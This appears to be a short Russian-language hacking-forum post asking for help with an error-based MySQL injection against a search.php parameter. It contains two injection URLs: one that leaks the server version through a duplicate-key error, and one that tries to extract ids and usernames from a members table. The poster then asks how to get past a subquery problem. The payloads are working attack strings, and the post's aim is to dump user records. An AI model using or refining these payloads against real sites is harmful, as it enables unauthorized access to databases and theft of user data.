Итак имеем error based:
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1/*
Duplicate entry '4.1.14-standard1' for key 1
Знаем таблицу и поля:
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat((select concat_ws(0x3a,id,uname,0x3a) from members+limit+1,1),floor(rand(0)*2)) having min(0) or 1/*
но получаем стандартный вывод поисковика, без сообщения об ошибке
если убрать limit то соответственно: Subquery returns more than 1 row
куды копать?